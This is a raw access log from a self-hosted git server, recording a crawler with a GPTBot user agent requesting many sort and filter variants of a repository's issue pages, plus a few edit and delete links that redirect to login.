"/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:55:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:55:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PythonTest/import%20sys.py" +[17/Feb/2026:17:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10216] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10235] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10233] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:17:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:17:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:17:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:17:56:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 